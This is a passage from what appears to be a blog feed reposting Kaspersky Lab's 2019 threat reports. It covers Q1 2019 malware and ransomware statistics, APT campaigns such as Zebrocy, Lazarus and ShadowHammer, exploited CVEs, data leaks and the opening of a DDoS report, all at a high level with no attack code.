Recall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.

Financial threat statistics

In Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.

Number of unique users attacked by financial malware, Q1 2019

Attack geography

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.

Top 10 countries by share of attacked users Country* %** South Korea 2.2 China 2.1 Belarus 1.6 Venezuela 1.6 Serbia 1.6 Greece 1.5 Egypt 1.4 Pakistan 1.3 Cameroon 1.3 Zimbabwe 1.3

* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000).
** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country.

Top 10 banking malware families Name Verdicts %* 1 RTM Trojan-Banker.Win32.RTM 27.4 2 Zbot Trojan.Win32.Zbot 22.9 3 Emotet Backdoor.Win32.Emotet 9.4 4 Trickster Trojan.Win32.Trickster 6.6 5 Nymaim Trojan.Win32.Nymaim 5.9 6 Nimnul Virus.Win32.Nimnul 4.6 7 SpyEye Backdoor.Win32.SpyEye 4.3 8 Neurevt Trojan.Win32.Neurevt 3.6 9 NeutrinoPOS Trojan-Banker.Win32.NeutrinoPOS 2.6 10 Tinba Trojan-Banker.Win32.Tinba 1.4

** Unique users attacked by this malware as a percentage of all users attacked by financial malware.

In Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).

Ransomware programs Quarterly highlights

The most high-profile event of the quarter was probably the LockerGoga ransomware attack on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because in the event of penetration, instead of using ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.

A vulnerability was discovered in the popular WinRAR archiver that allows an arbitrary file to be placed in an arbitrary directory when unpacking an ACE archive. The cybercriminals did not miss the chance to assemble an archive that unpacks the executable file of the JNEC ransomware into the system autorun directory.

February saw attacks on network-attached storages (NAS), in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What’s more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.

Nomoreransom.org partners, in cooperation with cyber police, created a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware to restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement, the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.

Statistics Number of new modifications

The number of new modifications fell markedly against Q4 2018 to the level of Q3. Seven new families were identified in the collection.

Number of new ransomware modifications, Q1 2018 – Q1 2019

Number of users attacked by ransomware Trojans

In Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.

In February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.

Number of unique users attacked by ransomware Trojans, Q1 2019

Attack geography

Geography of mobile ransomware Trojans, Q1 2019

Top 10 countries attacked by ransomware Trojans Country* % of users attacked by cryptors** 1 Bangladesh 8.11 2 Uzbekistan 6.36 3 Ethiopia 2.61 4 Mozambique 2.28 5 Nepal 2.09 6 Vietnam 1.37 7 Pakistan 1.14 8 Afghanistan 1.13 9 India 1.11 10 Indonesia 1.07

* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.

Top 10 most common families of ransomware Trojans Name Verdicts* Percentage of attacked users** 1 WannaCry Trojan-Ransom.Win32.Wanna 26.25 2 (generic verdict) Trojan-Ransom.Win32.Phny 18.98 3 GandCrab Trojan-Ransom.Win32.GandCrypt 12.33 4 (generic verdict) Trojan-Ransom.Win32.Crypmod 5.76 5 Shade Trojan-Ransom.Win32.Shade 3.54 6 (generic verdict) Trojan-Ransom.Win32.Encoder 3.50 7 PolyRansom/VirLock Virus.Win32.PolyRansom 2.82 8 (generic verdict) Trojan-Ransom.Win32.Gen 2.02 9 Crysis/Dharma Trojan-Ransom.Win32.Crusis 1.51 10 (generic verdict) Trojan-Ransom.Win32.Cryptor 1.20

* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors.

Miners Statistics Number of new modifications

In Q1 2019, Kaspersky Lab solutions detected 11,971 new modifications of miners.

Number of new miner modifications, Q1 2019

Number of users attacked by miners

In Q1, we detected attacks using miners on the computers of 1,197,066 unique users of Kaspersky Lab products worldwide.

Number of unique users attacked by miners, Q1 2019

Attack geography Top 10 countries by share of users attacked by miners Country* %** 1 Afghanistan 12.18 2 Ethiopia 10.02 3 Uzbekistan 7.97 4 Kazakhstan 5.84 5 Tanzania 4.73 6 Ukraine 4.28 7 Mozambique 4.17 8 Belarus 3.84 9 Bolivia 3.35 10 Pakistan 3.33

* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky Lab products in the country.

Vulnerable applications used by cybercriminals

Statistics for Q1 2019 show that vulnerabilities in Microsoft Office are still being utilized more often than those in other applications, due to their easy exploitability and highly stable operation. The percentage of exploits for Microsoft Office did not change much compared to the previous quarter, amounting to 69%.

Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2019

This quarter’s most popular vulnerabilities in the Microsoft Office suite were CVE-2017-11882 and CVE-2018-0802. They relate to the Equation Editor component, and cause buffer overflow with subsequent remote code execution. Lagging behind the chart leaders by a factor of almost two is CVE-2017-8570, a logical vulnerability and an analog of the no less popular CVE-2017-0199. Next comes CVE-2017-8759, where an error in the SOAP WSDL parser caused malicious code to be injected and the computer to be infected. Microsoft Office vulnerabilities are overrepresented in the statistics partly due to the emergence of openly available generators of malicious documents that exploit these vulnerabilities.

In Q1, the share of detected vulnerabilities in browsers amounted to 14%, almost five times less than for Microsoft Office. Exploiting browser vulnerabilities is often a problem, since browser developers are forever coming up with new options to safeguard against certain types of vulnerabilities, while the techniques for bypassing them often require the use of entire vulnerability chains to achieve the objective, which significantly increases the cost of such attacks.

However, this does not mean that in-depth attacks for browsers do not exist. A prime example is the actively exploited zero-day vulnerability CVE-2019-5786 in Google Chromehttps://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html. To bypass sandboxes, it was used in conjunction with an additional exploit for the vulnerability in the win32k.sys driver (CVE-2019-0808), with the targets being users of 32-bit versions of Windows 7.

It is fair to say that Q1 2019, like the quarter before it, was marked by a large number of zero-day targeted attacks. Kaspersky Lab researchers found an actively exploited zero-day vulnerability in the Windows kernel, which was assigned the ID CVE-2019-0797. This vulnerability exploited race conditions caused by a lack of thread synchronization during undocumented system calls, resulting in Use-After-Free. It is worth noting that CVE-2019-0797 is the fourth zero-day vulnerability for Windows found by Kaspersky Lab recent months.

A remarkable event at the beginning of the year was the discovery by researchers of the CVE-2018-20250 vulnerability, which had existed for 19 years in the module for unpacking ACE archives in the WinRAR utility. This component lacks sufficient checks of the file path, and a specially created ACE archive allows cybercriminals to inject an executable file into the system autorun directory. The vulnerability was immediately used to start distributing malicious archives.

Despite the fact that two years have passed since the vulnerabilities in the FuzzBunch exploit kit (EternalBlue, EternalRomance, etc.) were patched, these attacks still occupy all the top positions in our statistics. This is facilitated by the ongoing growth of malware that uses these exploits as a vector to distribute itself inside corporate networks.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that are sources of web-based attacks:

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2019, Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources located in 203 countries across the globe. 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.

Distribution of web attack sources by country, Q1 2019

This quarter, Web Anti-Virus was most active on resources located in the US.

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Venezuela 29.76 2 Algeria 25.10 3 Greece 24,16 4 Albania 23.57 5 Estonia 20.27 6 Moldova 20.09 7 Ukraine 19.97 8 Serbia 19.61 9 Poland 18.89 10 Kyrgyzstan 18.36 11 Azerbaijan 18.28 12 Belarus 18.22 13 Tunisia 18.09 14 Latvia 17.62 15 Hungary 17.61 16 Bangladesh 17,17 17 Lithuania 16.71 18 Djibouti 16.66 19 Reunion 16.65 20 Tajikistan 16.61

* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.

On average, 13.18% of Internet user computers worldwide experienced at least one Malware-class attack.

Geography of malicious web attacks in Q1 2019 (percentage of attacked users)

Local threats

Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, and external hard drives.

In Q1 2019, our File Anti-Virus detected 247,907,593 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of users of Kaspersky Lab products on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that as of this quarter, the rating includes only Malware-class attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Uzbekistan 57.73 2 Yemen 57.66 3 Tajikistan 56.35 4 Afghanistan 56.13 5 Turkmenistan 55.42 6 Kyrgyzstan 51.52 7 Ethiopia 49.21 8 Syria 47.64 9 Iraq 46,16 10 Bangladesh 45.86 11 Sudan 45.72 12 Algeria 45.35 13 Laos 44.99 14 Venezuela 44,14 15 Mongolia 43.90 16 Myanmar 43.72 17 Libya 43.30 18 Bolivia 43,17 19 Belarus 43.04 20 Azerbaijan 42.93

* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.

These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, or external hard drives.

On average, 23.62% of user computers globally faced at least one Malware-class local threat in Q1.

2019. május 23.

IT threat evolution Q1 2019

Targeted attacks and malware campaigns Go Zebrocy

Zebrocy was first observed being used as a Sofacy backdoor in 2015. However, the collection of cases where this tool has been used mean that we consider it a subset of activity in its own right. On the basis of this threat actor’s past behaviour, we predicted last year that Zebrocy would continue to innovate in its malware development. The group has developed using Delphi, AutoIT, .NET, C# and PowerShell. Since May 2018, Zebrocy has added the “Go” language to its arsenal – the first time that we have observed a well-known APT threat actor deploy malware with this compiled open-source language.

Zebrocy continues to target government-related organizations in Central Asia, both in-country and in remote locations, as well as a new diplomatic target in the Middle East. The group also continued to innovate. Much of the spear-phishing remains thematically the same and continues to be characteristically high volume for a targeted attacker – a trend that is likely to continue. However, the remote locations of the Central Asian targets are becoming more spread out – including South Korea, the Netherlands and others. The focus to date has been on Windows, but we expect the group to continue making further innovations within its malware set – perhaps all their components will soon support every platform used by their victims, including Linux and Mac OS.

GreyEnergy overlap with Zebrocy

GreyEnergy is believed to be a successor to the BlackEnergy group (aka Sandworm), best known for its involvement in attacks on Ukrainian energy facilities in 2015 that led to power outages. Like its predecessor, GreyEnergy has been detected attacking industrial and ICS targets, mainly in Ukraine.

Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and Zebrocy.

No direct evidence exists as to the origins of GreyEnergy, but the links between GreyEnergy and Zebrocy suggest the groups are related. Kaspersky Lab researchers have detailed how both groups shared the same C2 (command-and-control) server infrastructure for a certain period of time and how both targeted the same organization almost simultaneously, which more or less confirms the relationship between the two.

Chafer uses Remexi malware to spy on Iran-based diplomatic agencies

Throughout autumn 2018, we analyzed a long-standing (and still active at that time) cyber-espionage campaign that primarily targeted foreign diplomatic entities in Iran. The attackers used an improved version of the Remexi malware, previously associated with an APT threat actor that Symantec calls Chafer. This group has been observed since at least 2015, but based on things such as compilation time-stamps, and C2 registration, it’s possible that the group has been active for even longer. Traditionally, Chafer has focused on targets inside Iran, although its interests clearly include other countries in the Middle East.

The attackers rely heavily on Microsoft technologies on both client and server sides. The Trojan uses standard Windows utilities such as the Microsoft BITS (Background Intelligent Transfer Service) “bitsadmin.exe” to receive commands and exfiltrate data. This data includes keystrokes, screenshots, and browser-related data such as cookies and history, decrypted where possible. The C2 is based on IIS using .ASP technology to handle the victims’ HTTP requests.

New zero-day vulnerability exploited by APT threat actors

In February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows – the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have discovered recently using our technologies. Further analysis led us to uncover a zero-day vulnerability in “win32k.sys”. We reported this to Microsoft on February 22, who confirmed the vulnerability and assigned it CVE-2019-0797. Microsoft released a patch on March 12, 2019, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin with the discovery. Just as with CVE-2018-8589, we believe that this exploit is being used by several threat actors, including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to have used zero-days before, SandCat is a new APT actor that we discovered only recently.

Lazarus continues to target crypto-currency exchanges

The Lazarus APT group is well-known for targeting financial organizations. In the middle of 2018, we published our report on ‘Operation AppleJeus‘, highlighting the threat actor’s focus on crypto-currency exchanges, using a fake company with a backdoored product aimed at crypto-currency businesses. One of the key findings was the group’s new ability to target Mac OS. Since then, Lazarus has expanded its operations for this platform. Further tracking of the group’s activities enabled us to discover a new operation, active since at least November 2018, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers.

The Lazarus group continues to update its TTPs (Tactics, Techniques and Procedures) to help it fly under the radar. We would urge organizations involved in the booming crypto-currency or technological startup industry to exercise extra caution when dealing with new third parties or installing software. It’s best to check new software with an anti-virus program or at least use popular free virus-scanning services such as VirusTotal. You should never set ‘Enable Content’ (macro scripting) in Microsoft Office documents received from new or untrusted sources. If you need to try out new applications, it’s better to do so offline or on an isolated network virtual machine which you can erase with a few clicks. For more details on this and other research, you can subscribe to our APT intelligence reports.

Under the [Shadow]Hammer

In January, we discovered a sophisticated supply-chain attack involving the ASUS Live Update Utility, used to deliver BIOS, UEFI and software updates to ASUS laptops and desktops. The attackers added a backdoor to the utility and then distributed it to users through official channels. ASUS has a wide install base, making this an attractive target for APT threat actors. The compromised version of the utility was distributed to a large number of people between June and November 2018. Our telemetry shows that 57,000 Kaspersky Lab customers downloaded and installed it, although we believe the real scale of the problem is much bigger, possibly affecting over a million users worldwide.

The goal of the attack was to surgically target an unknown pool of users, identified by their network adapter MAC addresses. The attackers hardcoded a list of MAC addresses in the Trojanized samples, which identifies the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it’s possible that other samples exist which target different MAC addresses. You can check if your MAC address is on the target list here.

Other malware news Razy Trojan steals crypto-currency

While many browser extensions make our lives easier, some are altogether more dangerous, bombarding us with advertising or collecting information about our activities. Some are even designed to steal money. We recently reported the Razy Trojan, malware that installs a malicious browser extension on the victim’s computer or infects an already installed extension. To do so, it disables the integrity check for installed extensions and automatic updates for the targeted browser. The Trojan works with Google Chrome, Mozilla Firefox and Yandex browsers, though it has different infection scenarios for each browser type. Razy spreads via advertising blocks on websites and is distributed from free file-hosting services under the guise of legitimate software. Razy serves several purposes, mostly related to the theft of crypto-currency. Its main tool, the script ‘main.js’, is capable of searching for addresses of crypto-currency wallets on websites and replacing them with the attacker’s wallet addresses, spoofing images of QR codes pointing to wallets, modifying the web pages of crypto-currency exchanges and spoofing Google and Yandex search results.

Turning ATMs into slot machines

‘Jackpotting’ refers to the fraudulent methods used by criminals to obtain cash from ATMs. One recent example is the WinPot malware. The malware is notable because the criminals designed the user interface to resemble a slot machine.

However, unlike the machines in a casino, an ATM infected with WinPot always pays out – to the criminals. The malware window displays the denomination of banknotes for each cassette, so that the money mule operating the malware just needs to select the cassette with the most money in it and press ‘Spin’. The ‘Scan’ button can be used to recount the notes. The authors also include an emergency ‘Stop’ button, to allow the mule to cut short the pay out so as not to arouse suspicion.

There are several versions of the malware, and while their core functionality is essentially the same, there are some differences. For example, some versions will only dispense cash for a limited period of time and then they deactivate themselves. As with Cutlet Maker, WinPot is available on the Darknet for between $500 and $1,000, depending on the version.

To block attacks of this kind, we recommend that banks adopt device control and whitelisting. The former will block attempts to implant malware in the ATM using a USB device, while the latter will prevent execution of unauthorized software on the ATM. Kaspersky Embedded Systems Security can be used to secure ATMs.

Pirate Matryoshka

Using torrent trackers to spread malware is a well-known practice: cybercriminals disguise it as popular software, computer games, media files and other sought-after content. Earlier this year we detected one such campaign, when The Pirate Bay (TPB) tracker filled up with harmful files used to distribute malware under the guise of cracked copies for paid programs. The tracker contained malicious torrents created from dozens of different accounts, including those registered on TBP for quite some time. Instead of the expected software, the downloaded file was a Trojan, Pirate Matryoshka, whose basic logic was implemented by SetupFactory installers.

During the initial stage, the installer decrypts another SetupFactory installer to display a phishing web page. This page opens directly in the installation window and requests the user’s TBP account credentials, supposedly to continue the process. The second downloaded component is also a SetupFactory installer, used to decrypt and run four PE files in sequence. The second and fourth of these files are downloaders for the InstallCapital and MegaDowl file partner programs (which Kaspersky Lab classifies as adware). These usually find their way on to people’s computers through file sharing sites. Besides downloading the required content, their goal is to install additional software while carefully hiding the option to cancel.

The other two files are auto-clickers written in Visual Basic that are required to prevent the user from canceling the installation of additional software (in which case the cybercriminals would go away empty-handed). The auto-clickers are run before the installers: when the installer windows are detected, they check the boxes and click the buttons needed to give the user’s consent to install the unnecessary software.

Pirate Matryoshka results in the victim being flooded with unwanted programs. The owners of file partner programs often do not track the programs offered in their downloaders: our research shows that one in five files offered by partner installers is malicious, including pBot, Razy and others.

Mirai now used to target enterprise devices

Researchers from Palo Alto Networks’ Unit 42 recently reported a new variant of Mirai, the infamous IoT botnet. This malware is best known for its use in a massive DDoS attack on the servers of DNS provider Dyn, in 2016. The botnet is now equipped with a much wider range of exploits, which makes it even more dangerous and allows it to spread faster.

More troubling is the fact that the new strain is targeting not only its usual victims – routers, IP cameras, and other ‘smart’ things – but also enterprise IoT devices. This is no surprise since the Mirai source code was leaked some time ago, allowing any attacker with sufficient programming skills to use it. This explains why this botnet features highly in our report, ‘DDoS attacks in Q4 2018‘; and the fact that, in our report, ‘New trends in the world of IoT threats‘, Mirai is responsible for 21% of all IoT infections.

It is possible that future waves of Mirai infections might even include industrial IoT devices.

To reduce the risk of Mirai infection, we recommend that you install patches and firmware updates as soon as they become available, monitor traffic coming from each device for abnormalities, change default passwords and enforce an effective password policy for staff and re-boot any device that is behaving strangely (this will remove the malware from the device, but will not, on its own, prevent re-infection. To help companies protect themselves against the latest IoT-related threats we have released a new intelligence data feed for IoT-related threats.

‘Collection #1’ and other data leaks

On January 17, security researcher Troy Hunt reported a leak of more than 773 million email addresses and 21 million unique passwords. The data, dubbed ‘Collection #1’, was originally shared on the popular cloud service MEGA. Collection #1 is just a small part of a bigger leak of about 1TB of data, split into seven parts and distributed through a data-trading forum. The full package is a collection of credentials leaked from different sources during the past few years, the most recent being from 2017, so we were unable to identify any more recent data in this ‘new’ leak. The new data dump, dubbed ‘Collection #2-5’, was discovered by researchers at the Hasso Plattner Institute in Potsdam.

In February, further data dumps occurred. Details of 617 million accounts, stolen from 16 hacked companies, were put up for sale on Dream Market, accessible via the Tor network. The hacked companies include Dubsmash, MyFitnessPal, Armor Games and CoffeeMeetsBagel. Subsequently, data from a further eight hacked companies was posted to the same market place. Then in March, the hacker behind the earlier data dumps posted stolen data from a further six companies.

One of the particularly worrying aspects of these leaks is the fact that not all of the companies affected had previously reported the data breaches.

The impact on a company affected by a data breach goes beyond the loss of data. It includes the costs of investigating the breach, closing any security loopholes and maintaining business continuity. On top of that, a company’s reputation can be affected, especially if it becomes clear that the company failed to take adequate steps to secure the personal data of its customers.

The impact on customers can also be dramatic, especially if they use the same login credentials to access other online services. You can find our advice on how to mitigate the impact of a data breach here.

Social engineering

In our threat predictions for 2019, we described social engineering as the most successful infection vector ever and indicated why we thought it would remain so. The key to its success lies in sparking the curiosity of potential victims. Massive data leaks, such as the ones discussed above, help attackers to fine-tune their approach, making it more successful. Phishers will latch on to any topic that they think will pique the interest of their victims. We saw this recently in a campaign that hooked into events in Venezuela.

On February 10, Juan Guaido made a public call for volunteers to join a new movement called ‘Voluntarios por Venezuela’ (Volunteers for Venezuela), to help international organizations deliver humanitarian aid to the country. The original website asks volunteers to provide their full name, personal ID, cell phone number, and whether they have a medical degree, a car, or a smartphone, and also their location. The volunteers sign up and then receive instructions on how to help.

Just a few days after the legitimate site appeared, an almost identical website appeared. Both the legitimate and fake sites used SSL from Let’s Encrypt. The scariest aspect was that these two different domains, with different owners, were resolved within Venezuela to the same IP address, belonging to the fake domain owner. So it didn’t matter if a volunteer opened the legitimate domain name or the fake one – in the end their personal information was injected into a fake site.

In this scenario, where DNS servers are being manipulated, we would strongly recommend using public DNS servers such as Google DNS servers ( and or CloudFlare and APNIC DNS servers ( and We also recommend using VPN connections without a third-party DNS.

LockerGoga ransomware attacks

Ransomware continues to be a problem for consumers and businesses alike, notwithstanding a relative decline in numbers in the last two years. In 2018, we blocked 765,538 crypto-ransomware attacks on computers protected by Kaspersky Lab products, of which around 220,000 included corporate customers.

The most recent to hit the headlines is LockerGoga, which recently compromised the systems of Altran, Norsk Hydro and other companies. It’s unclear who’s behind the attacks, what they want and the mechanism used to first infect its victims. It’s not even clear if LockerGoga is ransomware or a wiper. The malware encrypts data and displays a ransom note asking victims to get in touch to arrange decryption, in return for an (unspecified) payment in bitcoins.

However, later versions were observed by researchers that forcibly log victims off infected systems by changing their passwords, and removing their ability to even log back in to the system. In such cases, the victims may not even get to see the ransom note.

19-year-old bug in WinRAR

Recently, researchers from Check Point discovered a long-standing vulnerability in the popular WinRAR utility – used by around 500 million people worldwide. This path traversal zero-day vulnerability (CVE-2018-20250) enables attackers to specify arbitrary destinations during file extraction of ‘ACE’-formatted files, regardless of user input.

This vulnerability has been fixed in the latest version of WinRAR (5.70), but since WinRAR itself does not contain an auto-update feature, it’s probable that many existing users will continue to run out-of-date versions.

The internet of secure, and not so secure, things

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. These include household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys, as well as cars, medical devices, CCTV cameras and parking meters. This offers a broad attack surface for anyone looking to take advantage of security weaknesses – for whatever purpose. Sadly, all too often we see reports of vulnerabilities in smart devices that could leave both consumers and organizations open to attack.

In February, at MWC19, researchers from our ICS CERT presented a report on the security of artificial limbs developed by Motorica. They looked at three aspects: firmware, the handling of data and the security of data in the cloud.

On the plus side, they found no vulnerabilities in the firmware of the prosthetic limbs themselves, or in the handling of data – since data flows one way only, from the limb to the cloud, it’s not possible to hack the device and take control of it remotely. However, they did find flaws in the development of the cloud infrastructure that could allow an attacker to gain access to data from the smart limb.

Werner Schober, a researcher at SEC Consult took an intimate look at the security of a sex toy. The device, designed to connect to an Android or iOS smartphone using Bluetooth, is controlled through a special app, either locally or remotely. On top of this, the app features a fully-fledged social network with group chats, photo galleries, friend-lists and more. The researcher was able to access the data of all users of the device, including usernames, passwords, chats, images and videos. Even worse, he was able to find a way to control the devices of other users. There was no mechanism for updating the firmware. However, he was able to find interfaces on the device that the manufacturer had used for debugging purposes and forgotten to close.

Researchers at Pen Test Partners recently discovered a flaw that exposes the sensitive data of children wearing GPS tracking watches, including their name, parents’ details and real-time location information. This was because of a secure privilege escalation vulnerability. The system failed to validate that the user had the appropriate permission to obtain admin control, so that an attacker with access to the watch’s credentials could change the permissions at the backend, exposing access to the account information and data stored on the watch.

It’s essential that vendors consider security when products are being designed. However, it’s also vital that consumers consider security before buying any connected device. This includes disabling functions that you don’t need – or even asking yourself if you need a connected version of the device at all. It also means looking online for information about any vulnerabilities that may have been reported and checking to see if it’s possible to update the firmware on the device. Finally, it’s important to change the default password and replace it with a unique, complex password. You can use the free Kaspersky IoT Scanner to check your Wi-Fi network and tell you if the devices connected to it are safe.

2019. május 21.

DDoS attacks in Q1 2019

News overview

The start of the year saw the appearance of various new tools in the arsenal of DDoS-attack masterminds. In early February, for instance, the new botnet Cayosin, assembled from elements of Qbot, Mirai, and other publicly available malware, swam into view. Cybersecurity experts were intrigued less by the mosaic structure and frequent updating of its set of exploited vulnerabilities than by the fact that it was advertised (as a DDoS service) not on the dark web, but through YouTube. What’s more, it is up for sale on Instagram (botnetters are clearly making the most of the opportunities afforded by social media). In tracing the cybercriminals’ accounts, the researchers stumbled upon other malware and botnets as well, including the already discovered Yowai.

Mid-March turned up another find in the shape of a new version of Mirai, geared towards attacking business devices. The malware is now able to “botnetize” not only access points, routers, and network cameras, but wireless presentation and digital signage systems, too.

Despite all this, the number of observed high-profile attacks using new and not-so-new botnets was not that high. At the end of winter, the University of Albany (UAlbany) in the US came under assault: during the February 5 – March 1 period, 17 attacks were made on it, downing the university servers for at least five minutes. Data belonging to students and staff was not affected, but some services were unavailable; the head of IT security at UAlbany believes that the university was specifically targeted.

In early February, the website of the National Union of Journalists of the Philippines was also hit. The site was disabled for several hours by a series of powerful attacks, peaking at 468 GB/s of traffic. The attack was part of a widespread campaign against various news resources. The targets believe themselves to be the victims of political pressure on alternative sources of information.

Also in mid-March, Facebook encountered serious problems with its services when Facebook and Instagram users were unable to log into their accounts. Many observers consider the incident to be DDoS-related. However, Facebook itself rejects this version of events, meaning that the real cause can only be guessed at.

The lack of news about serious DDoS attacks coincided with a rise in the number of reports of major police operations against attack organizers, accompanied by arrests and charges.

The fight to bring down resources used for DDoS attacks continues: in early January, the US Department of Justice seized 15 Internet domains from which a series of DDoS attacks was launched last December. According to DoJ documents, those domains were used to carry out attacks on government systems, ISPs, universities, financial institutions, and gaming platforms worldwide.

Later that same month, a US court handed down a 10-year jail term to a Massachusetts hacker for conducting DDoS attacks against two health facilities. Also in January, a hacker-for-hire was arrested in Britain for having incapacitated mobile networks in Liberia and Germany (at the peak of his criminal career in 2015, he took the whole of Liberia offline). Although his “work history” is far longer than that, no other charges were brought.

The shockwaves from last year’s operation to close down Webstresser.org — one of the most notorious sites providing DDoS attack services — continue to spread. Cyber police decided to go after not just the attack organizers, but the customers as well. At the end of January, Europol announced the arrest of more than 250 users in Britain and the Netherlands. Instead of prison, one of the convicted cybercriminals will receive an alternative punishment under the Dutch Hack_Right program, aimed at rehabilitating young hackers arrested for the first time. Other sources report that an investigation is underway into all 150,000 Webstresser clients resident in 20 different countries.

Yet despite the law enforcement efforts, DDoS attacks remain a real threat to business. As a Neustar International Security Council survey of 200 senior technical staff members of large companies revealed, firms today consider DDoS attacks to be a serious problem: 52% of security services have already faced them, and 75% are concerned about the issue.

Quarter trends

Last quarter, we made two predictions about trends in the DDoS attack market: first, that the market overall would contract; second, that demand for long-term “smart” attacks, in particular HTTP flooding, would grow.

The first did not happen: Kaspersky DDoS Protection statistics show that all DDoS attack indicators increased last quarter. The total number of attacks climbed by 84%, and the number of sustained (over 60 minutes) DDoS sessions precisely doubled. The average duration increased by 4.21 times, while the segment of extremely long attacks posted a massive 487% growth.

This forces a reassessment of the assumption made in last year’s Q3 and Q4 reports that the decrease in DDoS activity is linked to cybercriminals switching to the more reliable and profitable cryptocurrency mining. Clearly, this hypothesis is at least partially wrong.

There is another, more likely explanation: over the last six months of the previous year, we have been observing less the redistribution of botnet capacity for other purposes and more the emergence of a market vacuum. Most likely, the supply deficit was linked to the clamping down on DDoS attacks, the closure of sites selling related services, and the arrest of some major players over the past year. Now it seems the vacuum is being filled: such explosive growth in the indicators is almost certainly due to the appearance of new suppliers and clients of DDoS services. It will be interesting to observe how this trend develops in Q2. Will the indicators continue to rise, or will the market settle at the current level?

The second prediction (growing demand for smart application-level attacks) was more accurate: the share of long, harder-to-organize attacks is still growing, both qualitatively and quantitatively. We see no reason why this trend should not continue throughout Q2.

Statistics Methodology

Kaspersky Lab has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q1 2019.

